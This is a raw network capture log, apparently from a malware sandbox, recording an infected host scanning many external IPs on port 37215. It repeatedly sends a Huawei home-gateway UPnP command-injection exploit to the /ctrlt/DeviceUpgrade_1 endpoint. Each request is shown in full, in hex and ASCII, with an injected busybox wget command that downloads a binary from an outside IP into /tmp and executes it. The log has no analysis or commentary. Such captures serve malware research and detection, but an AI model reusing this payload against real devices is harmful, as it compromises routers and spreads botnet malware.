                                                                      Aug 2, 2024 13:17:06.664458990 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:07.498049021 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      104192.168.2.1443926156.51.98.19237215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:06.719660044 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      105192.168.2.1439592197.70.161.3037215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:06.721040010 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:07.625969887 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      106192.168.2.1453004156.115.222.19137215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:06.722146034 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:07.658047915 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.746067047 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:10.889983892 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:15.241771936 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:23.945368052 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
